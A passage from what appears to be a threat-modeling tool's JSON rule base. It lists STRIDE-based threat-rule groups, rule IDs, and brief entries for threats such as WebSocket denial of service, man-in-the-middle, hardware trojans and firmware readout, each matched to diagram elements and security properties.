","propertyID":"485ff476-0c99-41de-b90a-4fdd27730685"},{"ID":"0fdc96b6-5786-4d72-bd28-3683fd6c4169","Name":"Denial of service attack","Description":"WebSockets let an unlimited number of connections reach the server. This lets an attacker flood the server with a DOS attack. This greatly strains the server and exhausts the resources on that server. Then the website slows down greatly.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is the number of connections limited?","propertyID":"9616fd88-1e3d-4d72-9178-ad81d793a744"}],"threatRuleGroups":[{"ID":"dc027a7a-9824-4b6a-befb-cc68270f2ecb","Name":"Stencil Rules","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["48cd5ba9-d234-442e-aebb-0011005f806d","cb3d7440-5d0f-482a-93cb-5ae9c625e31d","3459508a-9169-41ce-8e3a-6ea968023a3a","821594a6-02e5-4a15-9a72-9cca5b57ee92","7cfa63f6-262b-4da3-aa88-6478522b45c5","5c21d6b7-2390-4f72-b29e-7d7985a30293","13b5172b-9d6c-49a3-9580-fb256d5cd506","ddfef636-378c-4874-b2ea-33b0fcfe22c5","32dab43f-2dc8-4109-9420-ee7c118a82d5","4609cf84-96fa-4054-bf45-5b33993ce648","1d39d1b0-8f3c-40f7-bb6d-f7699b3b4b07","358f4f37-445a-4336-8107-c02d7b9cd3a4","2759171a-24e3-4bfe-8ca7-5814902a000e","4c58a730-0161-4385-8249-bbf603ae1b88","af1cd836-48c2-437c-93d0-58b7c9e1d0f6","09881484-9a79-427d-a638-3e894af45c13","5c467e46-e642-49ad-a057-4784ec792125","2af47360-11c3-45e3-a43f-fc3efa8f6f4d","53fc96a4-96a0-42cc-bb2a-fc4515b8b008","9846541d-9bf3-4a2e-98cb-1ad13da5648b","1da12d13-b7ea-4179-8c6b-b87a338d95a5","63fb20c8-4a32-430e-bfa4-587503eaf572","d0736981-7141-4d93-b493-d99135b8d236","2b24dfec-f29a-4682-8066-db29831234ec","e3a2c92b-834f-408e-a4d2-87cfc66bd9fc","834aa7e3-1a0b-47a8-abdc-b4b1a6705377","78a3949d-8677-4426-b2b1-eb20b4296821","12caa9f9-0b1c-4ce0-ac2b-ebee69001b1e","38d27f20-a7ee-40dc-aa6f-b10c98d72409","8597431f-52e2-4d89-bb21-7d34185dbfe6","b8438e31-cc77-4400-86c0-14aa01d411ae","fa055483-b3a2-461f-b09c-46e99de0455e","9ec88af2-3da9-41df-93bf-8cbcb74a7bb6","b41b621c-4b91-43f9-90ab-b7e955269620","08043f24-cc72-435b-ace1-bd593442215d","e8848ea8-e120-4722-bc10-90daf7b4a075","0e783801-b482-4721-af49-1be96b16fc59","512c6921-1b40-4e26-86b5-f66609e57d96","6a9008d4-fa27-46b1-8a11-6dbcecb8b211","e5f4b790-5898-495d-9b51-5a16d452edff","e2529607-c1fd-472d-ad14-c7f2cc719282","a3c2f053-c8d6-4626-ae54-79f87ae171c3","221071ed-1d87-43cc-8052-b615e6ebef04","240eabff-0c74-40e7-9748-d4cc46f59403","ad30b363-be03-41a8-a422-3ad63cb077b1","a727e065-ff95-47d5-8aac-625dfc7a453c","ee25afa7-0267-4f20-96bb-9912494a383e","12c29b20-0467-40ab-9208-2c01d6142eab","063b7019-22aa-4eb8-8e6f-9f81dbeb513b","df2c1c56-e04e-4b33-aae2-e13c9305a370","1cd3c1af-ff49-461f-9f55-fadb851a0893","a1ac559b-0ed9-4e5c-815d-80d6dc23308e","132c57c4-fe66-4c94-95e3-98a67669a4a5","c9be8d05-1ea5-4947-a786-33b505f2c5fd","56e4871b-bcb7-48f6-bd9e-5a8273d0b62c","d9290f90-aa79-432f-92e0-267226771aea","961c5b9f-ea27-48ec-b526-514636536540","b76247eb-309c-4fad-9a8c-28fea0a98555","b9b2fbaa-be5c-48ca-bddc-6d4cb5989f96","ba71d0ae-0a71-40d5-a3e3-f15c3a3baa2b","b05b7085-3952-4f0d-bb85-7c380eb32f92","8d604765-2981-4a70-9cb0-9569411503cc","2b0c94a0-f2c7-4068-86e4-2d5f7ed3fe94","2c32278f-ea97-4aa1-8e85-982f76dee1b9","a777fa41-a13f-4225-af47-e4458a0c8f9e","ab670c99-4f5c-41c7-974c-a6704df1661b","d406176c-9381-4f8c-aecc-b6d7ba56c7da","82c0d2ca-5756-40bd-a2e9-3c7ab8c5c2ba","bd2cf4bb-a728-46bd-8d38-269b4cfef7be","d07d24f4-10b5-452d-a489-10c9752dda4d","6394d7a4-c2db-4fe6-826c-93b1cd0d5373"]},{"ID":"b02f311c-0bb2-4057-9dde-6225ebbf4e1b","Name":"Component Rules","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["8ab20d5d-f624-46f5-beeb-833327d8673f","34b65a9d-ca44-44b0-b66f-aa5bacfc53b4","67919611-8ec3-4d48-bbd7-03f963d6f12c","5585cf20-9e87-4ae5-960a-a952b07c37e5","b3a678a2-87a5-42ae-a1ef-4ec599554471","61452452-9fdc-4023-873d-93cd6d018abb","dde91006-ebc4-4e9c-906b-8c3591266097","a100a6c5-5f38-4224-a74a-825fa89579c2","96876c2e-a3e9-4e0f-afd0-fe721dd0f295","2b389d13-5f71-4bb4-b111-a7fee2b6a486","61e37274-9751-4250-8a4d-6476edc8f732","c54de80f-b548-4432-9ec0-fa3a579be7e6","c6535534-7656-4819-93fe-19d9a78a9390","85b3711a-33d2-4cd2-9c84-471e76cc761c","12c8413b-e1cc-40d6-ae07-6321c5fbf4a0","5aac31c8-fcb7-4d27-8937-e2c9747b83d4","6630ce3a-e21d-467a-b669-99418e95cd8a","6aec11cc-995c-4ee9-a1ce-506b071f3da3","2ee8ccf6-2886-4ebe-81d9-46a408b553a3","f46ae96c-b62c-4fda-955d-6ed55c157c7f","dfac545d-b449-45d0-95bd-a7814b1a97ce","4e5318de-8259-41cd-8704-8842a959b9c6","a904d935-a9d7-45d9-83c8-c403a57e0b80","8340469b-525d-4563-a75d-6ca1d60c7409","d714118d-123d-41b4-8997-63b13a5c09d4","90c71cb6-ec32-4eb6-95ca-20a5d7381fc6","cb711ade-c26b-4500-8337-4eba00d26975","1729c2ac-4dd2-449a-bd8a-ee7c11ff1461","b9caf305-7c53-48c9-beef-2fb2a96cc5b0","778eb19f-8f36-4ce5-aa48-70429386b113","c4df07d3-101f-492e-9f90-70d916f7ed43","b0d13562-1629-4724-bb67-f910157ed1c9","b4c216c0-ccab-4a4d-a156-1b4979dc2aec","c6ac1dcf-ff18-4810-ba64-10aaaf44c135","f51350c5-5401-4276-a8e5-14eba86bc070","e145ffad-ec47-4251-9fa4-1475133db2ff","cf4a11cf-4dee-46ef-8c68-48b5dced2de0","c46dc641-6f0f-4e80-9b80-3833f6c4f2c0","19f1cf08-5ab0-419c-9d56-b5d4d1fc6e24","370351b8-cef2-43bf-89f2-324a814e00a3","df78de64-d35e-474f-be3b-260f60a13fc6","ebf9833c-733d-4356-b390-e754096d0da8","543e017c-8bc2-444e-a3fb-d1dbd52ae21b","a68571c4-61b7-4a33-b5d9-104ef2c06ed0","4f2b98fa-8173-411d-a9b9-2cb0fb31fbde","96661040-05b5-436b-887a-f7864419d691","96208355-0119-41f4-9b93-b0a5781e9ae1","dfc187d5-8287-4c8e-99bc-09cc3e26e201","49344c1a-2368-4a01-a366-023707d0b354","b640f7fb-fb76-4de9-bcf2-0883807f58da","efd73610-90fd-406a-9139-82ff0552bc43","8886f368-618b-4520-a7f5-1db3141da66b","16f2c70d-1752-4e7a-b1ac-5f95710c2778","019f2476-ceca-47ab-b19e-9c2077cc35fe","11975f59-55e0-420f-9366-513175e9236e","1487298b-ff88-4e01-9a60-09b1eaf8a41f","10a258f6-49c0-435e-9a66-630039de0dc8","5d407978-73dc-45c9-8402-db692b42dae4","568a6a24-9109-4f93-b3b3-d3754260387e","5d59dab8-ca08-4359-8e7d-284dcde6d4b7","de96008b-1c59-4319-9b5c-4f5a7e97a122","337c4826-08ed-4c40-9542-54f08317ddb0","eac955da-c90f-4ca8-a1c1-bc186f7f0ad2","1267c02f-4adf-4086-9a9b-c5cc0f81c709","a529a0c3-a98e-41be-80f5-84b876ddddc6","b41315d4-f62d-4133-9a38-be8097a66ebb","50864039-1856-432a-9ff2-0acf3cccd644","d17d5929-ebcd-4c2c-95b6-f7c8ab4c5538","cffa8a3a-ec5b-4e2c-b118-80741e1c8e2a","8bab4292-bca9-4701-8141-a62fc2b2cded","ab8ff926-1147-4597-bded-42fbfb71edb2","135275c4-5523-4a95-a466-47947930377a","dbf5eca4-f98b-443d-b9a1-8113fafc962e","85519ed2-313e-4c85-85fd-f89109f845d4","871318c9-4e0c-4ff4-a475-06195ea4e3bb","bf9e6225-fb28-429a-84f1-fe3be63c3d95","ea2ba48d-b7f9-42c9-b9d9-f4a9816383b0","7f6ca653-a703-480c-b5d8-d82243171994","289c20cd-ea84-4375-8453-b045b94e1dc6","3a44327d-24d1-4c53-a3ea-7d891fb86f47","ea738f65-e0e7-4dc1-93b9-8798c4c8eeaf","6ffb7af3-466f-4cb7-965e-d60956b2ae7e","b2c6473b-9498-4b23-a02f-13e3818496d0","ca66721c-381d-43a1-9129-7643f04065d3","ff998b64-8348-4f41-8350-22ad07c68448","ab1d49fc-cb77-46cf-aeff-b4a28eb0d692","e014189e-5d3c-40c7-aac2-23202be3ccd4","a89ed38a-c36b-445b-a8c2-89e7289cdb9e","104ac1d9-34d6-4ce7-97f1-6d3dedcfbb59","2b82faea-2950-430d-8b52-273d9b0320e2","eaee9e9f-c3d7-42d7-9f8a-3d538cb9a17e","03778e71-e9a1-4528-b1db-547990486b27","359293f9-3fe1-4b61-99cb-332809add1f5","60b7ed0a-97b4-4904-a3bf-6d3ebdf01954","65c95996-5153-4f47-a7cd-0ffe05f96309","23c52b69-1923-416b-99a4-620d36961365","d0a3fe39-6894-44c5-91ec-1f1019ffda37","fdc27962-5622-47e7-8de8-ca1b60009276","d0bd34ae-02d2-46e9-b45a-0130be9713c4","662c14ed-b7cf-490a-97b8-978836d022bb","2d55c643-21db-426a-be29-d21f7f1965a4","3c1166bd-b978-4361-9846-33cd050dd968","42b3d570-e03c-440d-b7a4-87614c6b2e2c","d54bae32-33ff-4b3a-b583-07b53b4c947b","58d38f0f-82b4-4ecb-a95f-237adcfcb58c","cf9cef5a-3e4e-47cd-aa03-22522a1ce3e9","ae2e4063-13cd-414e-811d-3d114365f85f","db9dfe37-7599-4257-a425-e4948ffb8618","4c2aaafd-3248-4b30-b011-cddef8e75876","c68e523a-cba1-41b2-95ce-c8d634fd4396","a40575c4-b39f-4c9e-a4cb-3e15e3f27777","8825c214-9562-4a85-8538-a0530d2b79ee","ef631565-02d7-4f52-a80b-e615224409df","61c1d062-4c94-4af4-bd64-26a632462653","88d04fe9-ac62-4371-89d3-89471ac13027","ca3e9dda-cb0d-4f16-8b14-d0b11e4210cb","d5c0c703-75c1-42dd-a0d0-ca114eb7cdb4","9c362082-55b7-4c48-ac28-e381f5f38a2d","b634e0fe-6f3f-4c75-9df4-98f589d3a3f0","a05007e9-ca76-4584-a7be-47cf4a9625c4","f424f4d3-b3c2-4718-8c5f-ec9b3b6eef74","1a54b8f3-ecd6-4704-9f6c-e05b7e948548","105910c0-a5b5-4496-a2f7-99f11422e4b0","8f8d0183-5a29-451a-bb84-df061c0728d4","b274e8f6-5a0f-4efc-bc4e-40210c2035ad","ea3713af-49ae-4069-8353-78141725af6f","b8d4d723-fe3b-4288-87da-c73fc2412fc5","fa8d45ee-bfc7-47d7-9eed-4b38bc797336","db990108-a992-40e4-b2fc-d4dd00d42431","ac0e3170-0187-47e8-a2ed-6671cc24137e","7d0edcb5-7eff-490e-8d29-db68172ddd20","cc7e24ac-cfc0-4cf8-a291-386735862947","341eaf3e-808c-45de-9445-6be3cc66777b"]},{"ID":"1d995fc2-d7a5-4f46-ae16-954b8603b7fe","Name":"CPDFD Rules","Description":"","threatRuleGroupIDs":["cf6ecec7-3ece-4371-b6cc-976a435023ee","78cbfae0-bbd0-47a5-91ff-223518ffd7b1","4198e708-4e70-41f4-9466-dfc4cc171bfc","27b2bc15-e19c-452e-b096-4f910810e42f","e95a6d53-4e91-412b-ba0e-7a6e2dd5a52b","5d6a6968-e654-4080-91f2-a0755ae8f9e0","85f70a97-fb3a-498b-8402-bcc7f6737f73"],"threatRuleIDs":[]},{"ID":"cf6ecec7-3ece-4371-b6cc-976a435023ee","Name":"Basic Network Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["8b527d06-5d08-41c1-91fc-1c4146858987","da0924b8-967c-406e-a2f5-a6ebac21de1d","b8e6349e-a52a-4f15-a349-312fc809fbb8","7b825bd7-222e-476f-bf22-85fe2e50eb6c","32d4322f-482d-4a59-8f62-964ef8014a0b","4440ba48-7d42-44cd-b5de-f6664ccc6259","1221dc8c-f495-4833-a027-c3c5d2dc1a7d","ef5ee1a2-c3b4-492d-b7be-d2285f10107c"]},{"ID":"5d6a6968-e654-4080-91f2-a0755ae8f9e0","Name":"STRIDE per Interaction (old)","Description":"According to Adam Shostack: Threat Modeling - Designing for Security","threatRuleGroupIDs":[],"threatRuleIDs":["29d9866c-8a0b-4443-ada2-116171c608f9","5bf95fe6-cca1-45f5-932a-454b16120983","950ae971-fb79-4df0-8df7-0ce1135ff194","6f361cd2-f478-4dad-a669-28ebcf80a5a2","2f6ebd9b-217d-4878-811f-069522e0161f","4f16fe8c-0967-4358-aa77-85d3bff2d8fa","7a18484f-4b3f-49ac-b95e-c963fea9d5d1","d1347b28-467e-4a98-b388-2e0ad6c7b99e","8f0df1ec-6bdc-4371-9f1e-230160e65fe4","a87f7506-1ff6-47db-8c8f-75153d3d8474","dedc4df7-5eab-4e98-aa28-5d16a99b98e7"]},{"ID":"4198e708-4e70-41f4-9466-dfc4cc171bfc","Name":"Implementation Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["b3450129-f094-4d50-bc87-efb4e8e84a12","4611ab6f-adbf-47f3-86ff-8af0ac645d80","3084a3b9-fdba-4bb1-97fa-c59ddbea7d22"]},{"ID":"27b2bc15-e19c-452e-b096-4f910810e42f","Name":"Physical Link Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["21c438f5-30d1-4cfc-9deb-78827b036a22","8aa3a3b1-0aff-4e15-ad59-cc40b75dbdbd","14a5667b-7aa9-41ef-82d1-c2a4e8e454aa","94f3da7c-2e51-4025-9521-d91bf790cdea","7892b860-7ed4-4109-ae03-3c290271fef6"]},{"ID":"78cbfae0-bbd0-47a5-91ff-223518ffd7b1","Name":"Advanced Network Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["8c29ed3b-b151-41de-81ae-627227aaa104"]},{"ID":"e95a6d53-4e91-412b-ba0e-7a6e2dd5a52b","Name":"STRIDE","Description":"","threatRuleGroupIDs":["12b0ec09-b6a6-48b9-8600-fc1816f3fe5f","8d69374e-a6be-40bc-a8b6-1365b3009c25","662f8645-0847-4a94-bd50-14b4615526cc","dd000a59-4eba-47ad-8fa5-4d2909ac5c44"],"threatRuleIDs":[]},{"ID":"12b0ec09-b6a6-48b9-8600-fc1816f3fe5f","Name":"Spoofing","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["6b4eb6d6-a03f-4678-a033-924bd5526f13","c6bc382b-d155-41c4-a41b-959d8a223e54","ab65566e-a317-4e67-b647-d79ac948a62b","87e896bb-eb2e-4481-801b-a11d31a4e5e3","38053480-8db1-4185-adcc-9ebb5b913bef"]},{"ID":"662f8645-0847-4a94-bd50-14b4615526cc","Name":"Repudiation","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["596fe057-9387-4f5c-bd01-ef81613739f4","3517184d-2795-45e8-8dde-667eb7aa8051","df93be9d-b184-4ee1-a1d0-4966c03721fc","8cc8d956-c72b-478c-88ba-e3dd362825a1","6e270c51-65fe-497d-baaa-e390617e27a6"]},{"ID":"dd000a59-4eba-47ad-8fa5-4d2909ac5c44","Name":"Denial of Service","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["b0d91b9a-111b-464b-8011-3e02defafe1d"]},{"ID":"8d69374e-a6be-40bc-a8b6-1365b3009c25","Name":"Tampering","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["fec7c871-d868-4edf-9bca-80c9061e830b"]},{"ID":"85f70a97-fb3a-498b-8402-bcc7f6737f73","Name":"STRIDE-per-Interaction","Description":"According to Adam Shostack: Threat Modeling - Designing for Security","threatRuleGroupIDs":[],"threatRuleIDs":["66f7a456-2edb-4d91-9bd1-aec421a92011","ddc5a2f1-7466-488d-a4f4-9f6a1520a00e","4d724289-8fe3-47c5-b44b-7fd9cac6c701","97682dbc-2fb9-456d-94c3-a6a09998b5a4","9e788439-62ed-44ea-9b19-093f92cf2223","30b01ab6-2eea-49ff-ac4e-f5838f8a8337","4f56c6cd-3daa-4b7a-91a5-740403957ff5","7b140721-9f7a-46a7-8290-931efec07769","557991c1-4eeb-40e1-96c3-c8a214278e29","8fabcdad-c70f-4416-8cb6-5c65a21142b0","f5894534-60a9-4363-84e5-4c0479ca71b9","71f98504-8182-4fb2-81ed-aea1e1953215","6d1d58a3-f4ff-4938-93d8-d91bb9ae3f58","6ca91e1b-746c-47bb-8cd3-2fa0c478042e","a1b5637c-fac3-4b49-bf3f-5f39ce8757da","c0158e50-7c0f-4457-a8ea-223ff165fdaf","984d970a-8ef5-445c-a15b-7613b313306c","a7f340d4-3aa2-45d2-9226-db55414c7f69","2a2ea224-58c9-4187-b721-940fc97b1c04","c1e53b74-7e9d-4566-b690-978bfc8b9af3","35915020-1d0c-4853-849d-d32159bf6401","1308104d-16da-432f-a70f-8de14a8bfbf9","3008afca-320c-489b-9ff6-f61b7cdf497c","46a79465-8cb7-4c8e-8025-e1a08e9620d8","134a6570-e75e-4c8a-bd2f-f02b5a052878","4c4d3f55-3ffd-4416-9bc3-4bf2921110e1","0115bdb1-d2ab-4bbc-bfd1-b23c831b5a70","b06930a0-bff1-49e4-889c-6211290de683","2a171a21-0d62-4159-b7ab-5e2ad1796fff","7e4e6144-6504-4796-a3ca-00962c0a9cbb","d59a4a10-780a-465b-86fa-292a07e7a89a","d675c061-7af1-4e49-a503-0b512a85f9da","427f13f4-ce93-4344-b6fc-1178ea54199e"]}],"threatRules":[{"ID":"48cd5ba9-d234-442e-aebb-0011005f806d","Name":"Hardware trojan","Description":"ToDo","IsActive":true,"Mapping":{"AttackVectorID":"b703d3d9-1f29-480a-b7ad-b11716727a91","ThreatCategoryIDs":["ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"6065e8dd-23c0-4dc9-ad51-628af88f3309","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsCustomDesign","ComparisonType":"==","Value":true}}]},"RuleGenerationType":2,"overridenRuleIDs":[],"Severity":3},{"ID":"b8e6349e-a52a-4f15-a349-312fc809fbb8","Name":"MitM attack","Description":"","IsActive":true,"Mapping":{"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesConfidentiality","ComparisonType":"==","Value":true}},{"Layer":1,"NodeNumber":-1,"IsOR":true,"RestType":1,"PropertyRest":{"ID":"ProvidesIntegrity","ComparisonType":"==","Value":false}},{"Layer":1,"NodeNumber":-1,"IsOR":true,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}},{"Layer":1,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}],"Target":-1,"AppliesReverse":true},"RuleGenerationType":1,"overridenRuleIDs":[],"Severity":4},{"ID":"29d9866c-8a0b-4443-ada2-116171c608f9","Name":"Process -> Data Store","Description":"Process has outbound data flow to data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"5bf95fe6-cca1-45f5-932a-454b16120983","Name":"Process -> Process","Description":"Process sends output to another process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"950ae971-fb79-4df0-8df7-0ce1135ff194","Name":"Process -> Ext. Entity","Description":"Process sends output to external entity (code).","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"6f361cd2-f478-4dad-a669-28ebcf80a5a2","Name":"Process -> Phy. Ext. Entity","Description":"Process sends output to external entity (human).","IsActive":false,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"2f6ebd9b-217d-4878-811f-069522e0161f","Name":"Process <- Data Store","Description":"Process has inbound data flow from a data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","f0e814f3-b3d2-4357-b155-8fffd70ec42e","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"4f16fe8c-0967-4358-aa77-85d3bff2d8fa","Name":"Process <- Process","Description":"Process has inbound data flow from a process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"7a18484f-4b3f-49ac-b95e-c963fea9d5d1","Name":"Process <- Ext. Entity","Description":"Process has inbound data flow from a external entity.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"d1347b28-467e-4a98-b388-2e0ad6c7b99e","Name":"Data Store <- Process","Description":"Process has outbound data flow to data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"8f0df1ec-6bdc-4371-9f1e-230160e65fe4","Name":"Data Store -> Process","Description":"Process has inbound data flow from data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"a87f7506-1ff6-47db-8c8f-75153d3d8474","Name":"Ext. Entity -> Process","Description":"External interactor passes input to process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"dedc4df7-5eab-4e98-aa28-5d16a99b98e7","Name":"Ext. Entity <- Process","Description":"External interactor gets input from process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"cb3d7440-5d0f-482a-93cb-5ae9c625e31d","Name":"Uncleared Content","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5656f112-8443-4245-aa38-38cd9d9375e0","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"69401648-0084-45ca-b984-505173c9cdb1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"NewProperty1","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":2},{"ID":"3459508a-9169-41ce-8e3a-6ea968023a3a","Name":"Physical Side Channels","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"c097b67f-1179-4f30-924c-3a4e54c04d9d","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"e8430761-3c2e-4db0-adbd-5310214574c2","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":2},{"ID":"821594a6-02e5-4a15-9a72-9cca5b57ee92","Name":"Firmware Readout","Description":"This enables IP theft and allows debugging of binaries to find further vulnerabilities that can be 